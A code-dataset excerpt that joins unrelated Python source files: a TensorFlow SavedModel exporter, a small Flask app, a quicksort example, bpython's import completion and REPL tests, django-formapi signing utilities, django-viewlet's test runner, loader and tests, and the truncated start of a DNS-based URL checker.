builder = tf.saved_model.builder.SavedModelBuilder(export_dir)
with tf.Session() as sess:
# Restore the checkpoint
ckpt = tf.train.get_checkpoint_state(ckpt_dir)
if ckpt and ckpt.model_checkpoint_path:
info('Restoring from ' + ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
else:
fail("Found no checkpoint in " + ckpt_dir)
# Write the SavedModel
info('Exporting SavedModel to ' + export_dir)
serving_signatures = {
'Transfer': #tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.saved_model.signature_def_utils.predict_signature_def(
{ tf.saved_model.signature_constants.PREDICT_INPUTS: img_placeholder },
{ tf.saved_model.signature_constants.PREDICT_OUTPUTS: preds }
)
}
builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING],
signature_def_map=serving_signatures,
clear_devices=True)
builder.save()
if __name__ == '__main__':
parser = argparse.ArgumentParser('Export SavedModel from the checkpoint of style transfer')
parser.add_argument('--ckpt_dir', type=str, required=True, help='Where the checkpoint is stored')
parser.add_argument('--export_dir', type=str, default='export', help='Where to write SavedModel')
parser.add_argument('--height', type=int, default=240, help='Image height')
parser.add_argument('--width', type=str, default=320, help='Image width')
parser.add_argument('--batch_size', type=int, default=1, help='Batch size for inference')
args, _ = parser.parse_known_args()
export(args)
``` |
{
"source": "5mattmatt1/happythings",
"score": 2
} |
#### File: rest-api/src/main.py
```python
from flask import Flask
from flask_cors import CORS
from models import init_models
from routes import init_routes
def main():
app = Flask(__name__)
app.config['SECRET_KEY'] = 'some-secret-key'
cors = CORS(app)
app.run()
if __name__ == "__main__":
main()
```
#### File: src/models/__init__.py
```python
from flask_sqlalchemy import SQLAlchemy
sa = SQLAlchemy()
def init_models(app):
sa.init_app(app)
``` |
{
"source": "5ME/Grokking-Algorithms",
"score": 4
} |
#### File: Grokking-Algorithms/04_quicksort/quicksort.py
```python
def quicksort(arr):
if len(arr) < 2: # 基线条件
return arr
else: # 递归条件
# 基准值
pivot = arr[0]
# 比基准值小的元素
less = [i for i in arr[1:] if i <= pivot]
# 比基准值大的元素
greater = [i for i in arr[1:] if i > pivot]
# 分别对子数组进行快速排序
return quicksort(less) + [pivot] + quicksort(greater)
def main():
arr = [6, 5, 8, 3, 9, 7, 4]
print(quicksort(arr))
if __name__ == "__main__":
main()
``` |
{
"source": "5monkeys/bpython",
"score": 2
} |
#### File: bpython/bpython/importcompletion.py
```python
from __future__ import with_statement
import imp
import os
import sys
import warnings
try:
from warnings import catch_warnings
except ImportError:
import contextlib
@contextlib.contextmanager
def catch_warnings():
"""Stripped-down version of `warnings.catch_warnings()`
(available in Py >= 2.6)."""
filters = warnings.filters
warnings.filters = list(filters)
try:
yield
finally:
warnings.filters = filters
py3 = sys.version_info[:2] >= (3, 0)
# The cached list of all known modules
modules = set()
fully_loaded = False
def complete(line, cw):
"""Construct a full list of possibly completions for imports."""
if not cw:
return None
tokens = line.split()
if tokens[0] not in ['from', 'import']:
return None
completing_from = False
if tokens[0] == 'from':
if len(tokens) > 3:
if '.' in cw:
# This will result in a SyntaxError, so do not return
# any matches
return None
completing_from = True
cw = '%s.%s' % (tokens[1], cw)
elif len(tokens) == 3:
if 'import '.startswith(cw):
return ['import ']
else:
# Will result in a SyntaxError
return None
matches = list()
for name in modules:
if not (name.startswith(cw) and name.find('.', len(cw)) == -1):
continue
if completing_from:
name = name[len(tokens[1]) + 1:]
matches.append(name)
if completing_from and tokens[1] in sys.modules:
# from x import y -> search for attributes starting with y if
# x is in sys.modules
_, _, cw = cw.rpartition('.')
module = sys.modules[tokens[1]]
matches.extend(name for name in dir(module) if name.startswith(cw))
elif len(tokens) == 2:
# from x.y or import x.y -> search for attributes starting
# with y if x is in sys.modules and the attribute is also in
# sys.modules
module_name, _, cw = cw.rpartition('.')
if module_name in sys.modules:
module = sys.modules[module_name]
for name in dir(module):
if not name.startswith(cw):
continue
submodule_name = '%s.%s' % (module_name, name)
if submodule_name in sys.modules:
matches.append(submodule_name)
if not matches:
return []
return matches
def find_modules(path):
"""Find all modules (and packages) for a given directory."""
if not os.path.isdir(path):
# Perhaps a zip file
return
try:
filenames = os.listdir(path)
except EnvironmentError:
filenames = []
for name in filenames:
if not any(name.endswith(suffix[0]) for suffix in imp.get_suffixes()):
# Possibly a package
if '.' in name:
continue
elif os.path.isdir(os.path.join(path, name)):
# Unfortunately, CPython just crashes if there is a directory
# which ends with a python extension, so work around.
continue
for suffix in imp.get_suffixes():
if name.endswith(suffix[0]):
name = name[:-len(suffix[0])]
break
if py3 and name == "badsyntax_pep3120":
# Workaround for issue #166
continue
try:
with catch_warnings():
warnings.simplefilter("ignore", ImportWarning)
fo, pathname, _ = imp.find_module(name, [path])
except (ImportError, SyntaxError):
continue
except UnicodeEncodeError:
# Happens with Python 3 when there is a filename in some
# invalid encoding
continue
else:
if fo is not None:
fo.close()
else:
# Yay, package
for subname in find_modules(pathname):
if subname != '__init__':
yield '%s.%s' % (name, subname)
yield name
def find_all_modules(path=None):
"""Return a list with all modules in `path`, which should be a list of
directory names. If path is not given, sys.path will be used."""
if path is None:
modules.update(sys.builtin_module_names)
path = sys.path
for p in path:
if not p:
p = os.curdir
for module in find_modules(p):
if not py3 and not isinstance(module, unicode):
try:
module = module.decode(sys.getfilesystemencoding())
except UnicodeDecodeError:
# Not importable anyway, ignore it
continue
modules.add(module)
yield
def find_coroutine():
global fully_loaded
if fully_loaded:
return None
try:
find_iterator.next()
except StopIteration:
fully_loaded = True
return True
def reload():
"""Refresh the list of known modules."""
modules.clear()
for _ in find_all_modules():
pass
find_iterator = find_all_modules()
```
#### File: bpython/test/test_repl.py
```python
import os
import unittest
from itertools import islice
from bpython import config, repl
class TestHistory(unittest.TestCase):
def setUp(self):
self.history = repl.History('#%d' % x for x in range(1000))
def test_is_at_start(self):
self.history.first()
self.assertNotEqual(self.history.index, 0)
self.assertTrue(self.history.is_at_end)
self.history.forward()
self.assertFalse(self.history.is_at_end)
def test_is_at_end(self):
self.history.last()
self.assertEqual(self.history.index, 0)
self.assertTrue(self.history.is_at_start)
self.assertFalse(self.history.is_at_end)
def test_first(self):
self.history.first()
self.assertFalse(self.history.is_at_start)
self.assertTrue(self.history.is_at_end)
def test_last(self):
self.history.last()
self.assertTrue(self.history.is_at_start)
self.assertFalse(self.history.is_at_end)
def test_back(self):
self.assertEqual(self.history.back(), '#999')
self.assertNotEqual(self.history.back(), '#999')
self.assertEqual(self.history.back(), '#997')
for x in range(997):
self.history.back()
self.assertEqual(self.history.back(), '#0')
def test_forward(self):
self.history.first()
self.assertEqual(self.history.forward(), '#1')
self.assertNotEqual(self.history.forward(), '#1')
self.assertEqual(self.history.forward(), '#3')
# 1000 == entries 4 == len(range(1, 3) ===> '#1000' (so +1)
for x in range(1000 - 4 - 1):
self.history.forward()
self.assertEqual(self.history.forward(), '#999')
def test_append(self):
self.history.append('print "foo\n"\n')
self.history.append('\n')
self.assertEqual(self.history.back(), 'print "foo\n"')
def test_enter(self):
self.history.enter('#lastnumber!')
self.assertEqual(self.history.back(), '#999')
self.assertEqual(self.history.forward(), '#lastnumber!')
def test_reset(self):
self.history.enter('#lastnumber!')
self.history.reset()
self.assertEqual(self.history.back(), '#999')
self.assertEqual(self.history.forward(), '')
class TestMatchesIterator(unittest.TestCase):
def setUp(self):
self.matches = ['bobby', 'bobbies', 'bobberina']
self.matches_iterator = repl.MatchesIterator(current_word='bob',
matches=self.matches)
def test_next(self):
self.assertEqual(self.matches_iterator.next(), self.matches[0])
for x in range(len(self.matches) - 1):
self.matches_iterator.next()
self.assertEqual(self.matches_iterator.next(), self.matches[0])
self.assertEqual(self.matches_iterator.next(), self. matches[1])
self.assertNotEqual(self.matches_iterator.next(), self.matches[1])
def test_previous(self):
self.assertEqual(self.matches_iterator.previous(), self.matches[2])
for x in range(len(self.matches) - 1):
self.matches_iterator.previous()
self.assertNotEqual(self.matches_iterator.previous(), self.matches[0])
self.assertEqual(self.matches_iterator.previous(), self.matches[1])
self.assertEqual(self.matches_iterator.previous(), self.matches[0])
def test_nonzero(self):
"""self.matches_iterator should be False at start,
then True once we active a match.
"""
self.assertFalse(self.matches_iterator)
self.matches_iterator.next()
self.assertTrue(self.matches_iterator)
def test_iter(self):
slice = islice(self.matches_iterator, 0, 9)
self.assertEqual(list(slice), self.matches * 3)
def test_current(self):
self.assertRaises(ValueError, self.matches_iterator.current)
self.matches_iterator.next()
self.assertEqual(self.matches_iterator.current(), self.matches[0])
def test_update(self):
slice = islice(self.matches_iterator, 0, 3)
self.assertEqual(list(slice), self.matches)
newmatches = ['string', 'str', 'set']
self.matches_iterator.update('s', newmatches)
newslice = islice(newmatches, 0, 3)
self.assertNotEqual(list(slice), self.matches)
self.assertEqual(list(newslice), newmatches)
class TestRepl(repl.Repl):
def __init__(self):
config_struct = config.Struct()
config.loadini(config_struct, os.devnull)
repl.Repl.__init__(self, repl.Interpreter(), config_struct)
self.input_line = ""
def current_line(self):
return self.input_line
class TestArgspec(unittest.TestCase):
def setUp(self):
self.repl = TestRepl()
self.repl.push("def spam(a, b, c):\n", False)
self.repl.push(" pass\n", False)
self.repl.push("\n", False)
def setInputLine(self, line):
"""Set current input line of the test REPL."""
self.repl.input_line = line
def test_func_name(self):
for (line, expected_name) in [("spam(", "spam"),
("spam(map([]", "map"),
("spam((), ", "spam")]:
self.setInputLine(line)
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.current_func.__name__, expected_name)
def test_syntax_error_parens(self):
for line in ["spam(]", "spam([)", "spam())"]:
self.setInputLine(line)
# Should not explode
self.repl.get_args()
def test_kw_arg_position(self):
self.setInputLine("spam(a=0")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.argspec[3], "a")
self.setInputLine("spam(1, b=1")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.argspec[3], "b")
self.setInputLine("spam(1, c=2")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.argspec[3], "c")
def test_lambda_position(self):
self.setInputLine("spam(lambda a, b: 1, ")
self.assertTrue(self.repl.get_args())
self.assertTrue(self.repl.argspec)
# Argument position
self.assertEqual(self.repl.argspec[3], 1)
def test_name_in_assignment_without_spaces(self):
# Issue #127
self.setInputLine("x=range(")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.current_func.__name__, "range")
self.setInputLine("{x:range(")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.current_func.__name__, "range")
self.setInputLine("foo(1, 2, x,range(")
self.assertEqual(self.repl.current_func.__name__, "range")
def test_nonexistent_name(self):
self.setInputLine("spamspamspam(")
self.assertFalse(self.repl.get_args())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "5monkeys/django-formapi",
"score": 2
} |
#### File: django-formapi/formapi/utils.py
```python
import hashlib
import hmac
import uuid
from urllib.parse import quote
from django.utils.encoding import force_str, smart_bytes, smart_str
def get_sign(secret, querystring=None, **params):
"""
Return sign for querystring.
Logic:
- Sort querystring by parameter keys and by value if two or more parameter keys share the same name
- URL encode sorted querystring
- Generate a hex digested hmac/sha1 hash using given secret
"""
if querystring:
params = dict(param.split("=") for param in querystring.split("&"))
sorted_params = []
for key, value in sorted(params.items(), key=lambda x: x[0]):
if isinstance(value, (bytes, str)):
sorted_params.append((key, value))
else:
try:
value = list(value)
except TypeError as e:
assert "is not iterable" in smart_str(e)
value = smart_bytes(value)
sorted_params.append((key, value))
else:
sorted_params.extend((key, item) for item in sorted(value))
return get_pairs_sign(secret, sorted_params)
def get_pairs_sign(secret, sorted_pairs):
param_list = ("=".join((field, force_str(value))) for field, value in sorted_pairs)
validation_string = smart_bytes("&".join(param_list))
validation_string = smart_bytes(quote(validation_string))
return hmac.new(smart_bytes(secret), validation_string, hashlib.sha1).hexdigest()
def prepare_uuid_string(value, default=None):
if isinstance(value, uuid.UUID):
value = value.hex
if not value:
return default
value = str(value).replace("-", "").strip().lower()
return value
``` |
{
"source": "5monkeys/django-viewlet",
"score": 2
} |
#### File: 5monkeys/django-viewlet/run_tests.py
```python
import os
import sys
import warnings
import django
from django.conf import settings
# We do it first before Django loads, and then again in tests
warnings.simplefilter("error")
warnings.filterwarnings("ignore", module="cgi")
ROOT = os.path.join(os.path.dirname(__file__), "viewlet/tests")
def main():
conf = {
"DEBUG": True,
"TEMPLATE_DEBUG": True,
"INSTALLED_APPS": [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.flatpages",
"viewlet",
"viewlet.tests",
],
"MIDDLEWARE_CLASSES": [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
],
"MEDIA_ROOT": "/tmp/viewlet/media",
"STATIC_ROOT": "/tmp/viewlet/static",
"MEDIA_URL": "/media/",
"STATIC_URL": "/static/",
"ROOT_URLCONF": "viewlet.tests.urls",
"SECRET_KEY": "iufoj=mibkpdz*%bob952x(%49rqgv8gg45k36kjcg76&-y5=!",
"TEMPLATE_CONTEXT_PROCESSORS": [
"django.core.context_processors.request",
],
"TEMPLATES": [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"DIRS": (os.path.join(ROOT, "template_dir"),),
"OPTIONS": {
"debug": True,
"context_processors": [
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
}
],
"JINJA2_TEMPLATES": [
{
"BACKEND": "django.template.backends.jinja2.Jinja2",
"APP_DIRS": True,
"DIRS": (
os.path.join(ROOT, "template_dir"),
os.path.join(ROOT, "templates"), # or change app_dirname
),
"OPTIONS": {
"extensions": [
"viewlet.loaders.jinja2_loader.ViewletExtension",
],
},
}
],
"JINJA2_ENVIRONMENT_OPTIONS": {"optimized": False}, # Coffin config
"JINJA_CONFIG": {"autoescape": True}, # Jingo config
}
conf["MIDDLEWARE"] = conf.pop("MIDDLEWARE_CLASSES")
conf.pop("TEMPLATE_DEBUG")
conf.pop("TEMPLATE_CONTEXT_PROCESSORS")
conf.update(
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": ":memory:",
}
}
)
conf.update(
CACHES={"default": {"BACKEND": "django.core.cache.backends.locmem.LocMemCache"}}
)
settings.configure(**conf)
django.setup()
from django.test.utils import get_runner
test_runner = get_runner(settings)(verbosity=2, interactive=True)
failures = test_runner.run_tests(["viewlet"])
sys.exit(failures)
if __name__ == "__main__":
main()
```
#### File: django-viewlet/viewlet/exceptions.py
```python
from django.template import TemplateSyntaxError
DEPRECATED_KEY_FORMAT_MESSAGE = (
"Key argument format has been changed. It can be a function or "
"a string containing `{args}`"
)
WRONG_KEY_FORMAT_MESSAGE = (
"If you want to use your custom key for a viewlet which has arguments, "
"please add `{args}` to the key where the arguments will be inserted."
)
class ViewletException(Exception):
pass
class UnknownViewlet(TemplateSyntaxError):
pass
class DeprecatedKeyFormat(ViewletException):
def __init__(self, message=None):
ViewletException.__init__(self, message or DEPRECATED_KEY_FORMAT_MESSAGE)
class WrongKeyFormat(ViewletException):
def __init__(self, message=None):
ViewletException.__init__(self, message or WRONG_KEY_FORMAT_MESSAGE)
```
#### File: viewlet/loaders/jinja2_loader.py
```python
from importlib import import_module
from django.conf import settings as django_settings
from jinja2 import ChoiceLoader, FileSystemLoader, PackageLoader, nodes
from jinja2.environment import Environment
from jinja2.ext import Extension
from jinja2.filters import do_mark_safe
import viewlet
from ..conf import settings
class ViewletExtension(Extension):
tags = {"viewlet"}
def parse(self, parser):
lineno = next(parser.stream).lineno
viewlet_args = []
name = None
first = True
while parser.stream.current.type != "block_end":
if not first:
parser.stream.expect("comma")
viewlet_args.append(parser.parse_expression())
else:
name = parser.parse_expression()
first = False
context = nodes.ContextReference()
return nodes.CallBlock(
self.call_method(
"_call_viewlet", args=[name, context, nodes.List(viewlet_args)]
),
[],
[],
[],
).set_lineno(lineno)
def _call_viewlet(self, name, context, viewlet_args, caller=None):
context = context.get_all()
return mark_safe(viewlet.call(name, context, *viewlet_args))
def create_env():
x = (
(FileSystemLoader, django_settings.TEMPLATE_DIRS),
(PackageLoader, django_settings.INSTALLED_APPS),
)
loaders = [loader(p) for loader, places in x for p in places]
env = Environment(loader=ChoiceLoader(loaders), extensions=[ViewletExtension])
return env
_env = None
def get_env():
global _env
if _env:
return _env
jinja2_env_module = settings.VIEWLET_JINJA2_ENVIRONMENT
module, environment = jinja2_env_module.rsplit(".", 1)
imported_module = import_module(module)
jinja2_env = getattr(imported_module, environment)
if callable(jinja2_env):
jinja2_env = jinja2_env()
_env = jinja2_env
return jinja2_env
def render_to_string(template_name, context):
return get_template(template_name).render(context)
def get_template(template_name):
return get_env().get_template(template_name)
def mark_safe(value):
return do_mark_safe(value)
```
#### File: viewlet/tests/test_viewlet.py
```python
import importlib
import logging
from time import sleep, time
import django
import django.conf
from django.template import TemplateSyntaxError, engines
from django.test import Client, TestCase, override_settings
from django.urls import reverse
from .. import (
cache as cache_m,
call,
conf,
exceptions,
get,
get_version,
library,
models,
refresh,
viewlet,
)
from ..cache import get_cache, make_key_args_join
from ..conf import settings
from ..exceptions import UnknownViewlet
from ..loaders import jinja2_loader
cache = get_cache()
__all__ = ["ViewletTest", "ViewletCacheBackendTest", "ViewletKeyTest"]
class ViewletTest(TestCase):
def setUp(self):
cache.clear()
@viewlet
def hello_world(context):
return "Hello wörld!"
@viewlet
def hello_name(context, name="wurld"):
return "Hello %s" % name
@viewlet(template="hello_world.html", timeout=0)
def hello_nocache(context, name="wurld"):
return {"name": name}
@viewlet(template="hello_world.html", timeout=10)
def hello_cache(context, name):
return {
"name": name,
"timestamp": time(),
}
@viewlet(name="hello_new_name", template="hello_world.html", timeout=10)
def hello_named_world(context, name):
return {
"name": name,
}
@viewlet(template="hello_timestamp.html", timeout=10)
def hello_cached_timestamp(context, name):
return {
"name": name,
"timestamp": time(),
}
self.hello_cached_timestamp = hello_cached_timestamp
@viewlet(template="hello_timestamp.html", timeout=None)
def hello_infinite_cache(context, name):
return {
"name": name,
"timestamp": time(),
}
@viewlet(template="hello_timestamp.html", timeout=0)
def hello_non_cached_timestamp(context, name):
return {
"name": name,
"timestamp": time(),
}
@viewlet(template="hello_strong_world.html", timeout=10)
def hello_strong(context, name):
return {"name": name}
@viewlet(template="hello_request.html", timeout=0)
def hello_request(context, greeting):
return {"greeting": greeting}
@viewlet(template="hello_from_dir.html", timeout=0)
def hello_from_dir(context, greeting):
return {"greeting": greeting}
@viewlet(timeout=0)
def hello_render_to_string(context):
from django.template.loader import render_to_string
context["greeting"] = "Hello"
return render_to_string("hello_request.html", context)
self.tail = "\n"
def tearDown(self):
jinja2_loader._env = None
settings.VIEWLET_JINJA2_ENVIRONMENT = "viewlet.loaders.jinja2_loader.create_env"
def get_django_template(self, source):
return "\n".join(("{% load viewlets %}", source))
def get_jinja_template(self, source):
with override_settings(TEMPLATES=django.conf.settings.JINJA2_TEMPLATES):
from django.template import engines
return engines["jinja2"].from_string(source)
def render(self, source, context=None, request=None):
kwargs = {"context": context or {}, "request": request}
return engines["django"].from_string(source).render(**kwargs).strip()
def test_version(self):
self.assertEqual(get_version((1, 2, 3, "alpha", 1)), "1.2.3a1")
self.assertEqual(get_version((1, 2, 3, "beta", 2)), "1.2.3b2")
self.assertEqual(get_version((1, 2, 3, "rc", 3)), "1.2.3c3")
self.assertEqual(get_version((1, 2, 3, "final", 4)), "1.2.3")
def test_get_existing_viewlet(self):
get("hello_cache")
def test_get_non_existing_viewlet(self):
self.assertRaises(UnknownViewlet, get, "i_do_not_exist")
def test_empty_decorator(self):
template = self.get_django_template("<h1>{% viewlet hello_world %}</h1>")
html1 = self.render(template)
self.assertEqual(html1, "<h1>Hello wörld!</h1>")
sleep(0.01)
html2 = self.render(template)
self.assertEqual(html1, html2)
def test_render_tag(self):
template = self.get_django_template(
"<h1>{% viewlet hello_nocache name=viewlet_arg %}</h1>"
)
html = self.render(template, {"viewlet_arg": "wörld"})
self.assertEqual(html.strip(), "<h1>Hello wörld!\n</h1>")
template = self.get_django_template("<h1>{% viewlet unknown_viewlet %}</h1>")
logging.disable(logging.ERROR)
self.assertRaises(UnknownViewlet, self.render, template)
logging.disable(logging.NOTSET)
template = self.get_django_template("<h1>{% viewlet hello_world name= %}</h1>")
self.assertRaises(TemplateSyntaxError, self.render, template)
def test_cached_tag(self):
template = self.get_django_template(
"<h1>{% viewlet hello_cached_timestamp 'world' %}</h1>"
)
html1 = self.render(template)
sleep(0.01)
html2 = self.render(template)
self.assertEqual(html1, html2)
def test_non_cached_tag(self):
template = self.get_django_template(
"<h1>{% viewlet hello_non_cached_timestamp 'world' %}</h1>"
)
html1 = self.render(template)
sleep(0.01)
html2 = self.render(template)
self.assertNotEqual(html1, html2)
def test_cache(self):
html1 = call("hello_cache", None, "world")
sleep(0.01)
html2 = call("hello_cache", None, "world")
self.assertEqual(html1, html2)
def test_unicode_cache(self):
html1 = call("hello_cache", None, "wörld")
sleep(0.01)
html2 = call("hello_cache", None, "wörld")
self.assertEqual(html1, html2)
def test_refresh(self):
template = self.get_django_template(
"<h1>{% viewlet hello_cached_timestamp 'world' %}</h1>"
)
html1 = self.render(template)
sleep(0.01)
refresh("hello_cached_timestamp", "world")
html2 = self.render(template)
self.assertNotEqual(html1, html2)
sleep(0.01)
self.hello_cached_timestamp.refresh("world")
html3 = self.render(template)
self.assertNotEqual(html3, html2)
sleep(0.01)
html4 = self.render(template)
self.assertEqual(html3, html4)
self.hello_cached_timestamp.expire("world")
html5 = self.render(template)
self.assertNotEqual(html5, html4)
def test_view(self):
client = Client()
url = reverse("viewlet", args=["hello_cache"])
response = client.get(url, {"name": "wörld"})
self.assertEqual(response.status_code, 200)
html = call("hello_cache", None, "wörld")
self.assertEqual(response.content.decode("utf-8"), html)
def test_view_request(self):
client = Client()
url = reverse("viewlet", args=["hello_request"])
response = client.get(url, {"greeting": "wörld"})
self.assertEqual(response.status_code, 200)
self.assertContains(response, "wörld AnonymousUser!")
def test_jinja_tag(self):
template = self.get_jinja_template(
"<h1>{% viewlet 'hello_nocache', viewlet_arg %}</h1>"
)
html = template.render({"extra": "Räksmörgås", "viewlet_arg": "wörld"})
self.assertEqual(html.strip(), "<h1>RäksmörgåsHello wörld!%s</h1>" % self.tail)
def test_context_tag(self):
template = self.get_django_template(
"<h1>{% viewlet hello_cached_timestamp 'world' %}</h1>"
)
self.render(template)
v = get("hello_cached_timestamp")
cache_key = v._build_cache_key("world")
viewlet_data = cache.get(cache_key)
self.assertTrue("name" in viewlet_data)
self.assertEqual(viewlet_data["name"], "world")
self.assertTrue(isinstance(viewlet_data, dict))
def test_infinite_cache(self):
template = self.get_django_template(
"<h1>{% viewlet hello_infinite_cache 'world' %}</h1>"
)
self.render(template)
v = get("hello_infinite_cache")
self.assertEqual(v.timeout, settings.VIEWLET_INFINITE_CACHE_TIMEOUT)
def test_expire_cache(self):
v = get("hello_cache")
v.call({}, "world")
cache_key = v._build_cache_key("world")
self.assertTrue(cache.get(cache_key) is not None)
v.expire("world")
self.assertTrue(cache.get(cache_key) is None)
def test_mark_safe(self):
# Test django
template = self.get_django_template(
"<h1>{% viewlet hello_strong 'wörld' %}</h1>"
)
html = self.render(template.strip())
self.assertEqual(html, "<h1>Hello <strong>wörld!</strong>\n</h1>")
# Test jinja2
template = self.get_jinja_template(
"<h1>{% viewlet 'hello_strong', 'wörld' %}</h1>"
)
html = template.render()
self.assertEqual(html, "<h1>Hello <strong>wörld!</strong>%s</h1>" % self.tail)
def test_cached_string(self):
template = self.get_django_template(
"<h1>{% viewlet hello_name name='wörld' %}</h1>"
)
html = self.render(template)
self.assertTrue(isinstance(html, str))
v = get("hello_name")
cache_key = v._build_cache_key("wörld")
cached_value = cache.get(cache_key)
self.assertTrue(isinstance(cached_value, bytes))
def test_named(self):
template = self.get_django_template(
"<h1>{% viewlet hello_new_name 'wörld' %}</h1>"
)
self.render(template)
self.assertTrue(get("hello_new_name") is not None)
def test_refreshing_context_viewlet_expecting_request_while_rendering_using_jinja2(
self,
):
template = self.get_jinja_template(
"{% viewlet 'hello_request', 'nice to see you' %}"
)
html = template.render({"request": {"user": "<NAME>"}})
refresh("hello_request", "nice to see you")
self.assertNotEqual(template.render({"request": {"user": "<NAME>"}}), html)
def test_django_template_from_dir(self):
template = self.get_django_template(
"{% viewlet hello_from_dir 'nice to see you' %}"
)
req = {"user": "<NAME>"}
html = self.render(template, context={"request": req}, request=req)
self.assertTrue(isinstance(html, str))
self.assertEqual(html, "nice to see you <NAME>!")
def test_jinja_template_from_dir(self):
template = self.get_jinja_template(
"{% viewlet 'hello_from_dir', 'nice to see you' %}"
)
html = template.render({"request": {"user": "<NAME>"}})
self.assertTrue(isinstance(html, str))
self.assertEqual(html, "nice to see you nicolas cage!\n")
def test_request_context(self):
template = self.get_django_template(
"""
<h1>{% viewlet hello_render_to_string %}</h1>
{% viewlet hello_render_to_string %}
{% viewlet hello_render_to_string %}
{% viewlet hello_render_to_string %}
{% viewlet hello_render_to_string %}
"""
)
context = {"test": "test"}
html = self.render(template, context=context, request="Request")
self.assertTrue(isinstance(html, str))
class ViewletCacheBackendTest(TestCase):
@override_settings(VIEWLET_DEFAULT_CACHE_ALIAS="dummy")
@override_settings(
CACHES={
"default": {"BACKEND": "django.core.cache.backends.locmem.LocMemCache"},
"short": {"BACKEND": "viewlet.tests.utils.ShortLocMemCache"},
"dummy": {"BACKEND": "django.core.cache.backends.dummy.DummyCache"},
}
)
def setUp(self):
self.assertNotEqual("dummy", conf.settings.VIEWLET_DEFAULT_CACHE_ALIAS)
for m in [
conf,
cache_m,
library,
models,
]: # conf must be reloaded first; do NOT move to a function
importlib.reload(m)
self.assertEqual("dummy", conf.settings.VIEWLET_DEFAULT_CACHE_ALIAS)
@viewlet(template="hello_timestamp.html", timeout=10)
def hello_cached_timestamp_settings_cache(context, name):
return {
"name": name,
"timestamp": time(),
}
@viewlet(template="hello_timestamp.html", using="short")
def hello_cached_timestamp_argument_cache(context, name):
return {
"name": name,
"timestamp": time(),
}
def tearDown(self):
del django.conf.settings.VIEWLET_DEFAULT_CACHE_ALIAS
for m in [
conf,
cache_m,
library,
models,
]: # conf must be reloaded first; do NOT move to a function
importlib.reload(m)
self.assertNotEqual("dummy", conf.settings.VIEWLET_DEFAULT_CACHE_ALIAS)
def test_cache_backend_from_settings(self):
v = get("hello_cached_timestamp_settings_cache")
v.call({}, "world")
cache_key = v._build_cache_key("world")
self.assertIsNone(v._cache_get(cache_key))
def test_cache_backend_from_argument(self):
v = get("hello_cached_timestamp_argument_cache")
v.call({}, "world")
cache_key = v._build_cache_key("world")
self.assertIsNotNone(v._cache_get(cache_key))
sleep(v.cache.default_timeout + 0.01)
self.assertIsNone(v._cache_get(cache_key))
class ViewletKeyTest(TestCase):
def setUp(self):
@viewlet(timeout=1, key="somekey")
def custom_key_without_args(context):
return "hello"
@viewlet(timeout=1, key="somekey")
def custom_key_missing_args(context, greet, name):
return f"{greet} {name}!"
@viewlet(timeout=1, key="somekey:{args}")
def custom_key_with_args(context, greet, name):
return f"{greet} {name}!"
@viewlet(timeout=1, key="somekey(%s,%s)")
def custom_key_old_format(context, greet, name):
return f"{greet} {name}!"
def test_custom_key_without_args(self):
v = get("custom_key_without_args")
self.assertEqual(v._build_cache_key(), "somekey")
def test_custom_key_missing_args(self):
v = get("custom_key_missing_args")
args = ("Hello", "world")
self.assertRaises(exceptions.WrongKeyFormat, v._build_cache_key, *args)
def test_custom_key_with_args(self):
v = get("custom_key_with_args")
args = ("Hello", "world")
v.call({}, *args)
cache_key = v._build_cache_key(*args)
self.assertTrue(v._build_cache_key().startswith("somekey:"))
self.assertEqual(v._cache_get(cache_key), "%s %s!" % args)
def test_custom_key_old_format(self):
v = get("custom_key_old_format")
args = ("Hello", "world")
self.assertRaises(exceptions.DeprecatedKeyFormat, v._build_cache_key, *args)
def test_key_args_join(self):
self.key_func = "viewlet.cache.make_key_args_join"
django.conf.settings.VIEWLET_CACHE_KEY_FUNCTION = self.key_func
self.assertNotEqual(self.key_func, conf.settings.VIEWLET_CACHE_KEY_FUNCTION)
for m in [
conf,
cache_m,
library,
models,
]: # conf must be reloaded first; do NOT move to a function
importlib.reload(m)
self.assertEqual(self.key_func, conf.settings.VIEWLET_CACHE_KEY_FUNCTION)
@viewlet(timeout=10)
def name_args_join(context, greet, name):
return f"{greet} {name}!"
v = get("name_args_join")
args = ("Hello", "world")
v.call({}, *args)
cache_key = v._build_cache_key(*args)
self.assertEqual(cache_key, make_key_args_join(v, args))
self.assertEqual(v._cache_get(cache_key), "%s %s!" % args)
del django.conf.settings.VIEWLET_CACHE_KEY_FUNCTION
for m in [
conf,
cache_m,
library,
models,
]: # conf must be reloaded first; do NOT move to a function
importlib.reload(m)
self.assertNotEqual(self.key_func, conf.settings.VIEWLET_CACHE_KEY_FUNCTION)
``` |
{
"source": "5N6R/NetLights",
"score": 3
} |
#### File: 5N6R/NetLights/NetLights.py
```python
import dns.resolver
import dns.rdtypes
import os, sys, re
from tkinter import *
ip=["192.168.127.12","172.16.58.3","172.16.31.10", "192.168.127.12","192.168.127.12",
"172.16.58.3","172.16.58.3","172.16.31.10"]
red=yellow=green=black=0
rez=[red,yellow,green,black]
def mous(event):
try:
cb=app.clipboard_get()
ii.set(cb)
except:
cl()
def cl() :
app.clipboard_clear()
ii.set("")
fr0.configure(bg="silver")
url=""
red=yellow=green=black=0
rez[0]=rez[1]=rez[2]=rez[3]=0
def checker(event):
rez[0]=rez[1]=rez[2]=rez[3]=0
url=ii.get()
if url!= "":
xx=url.split("//")
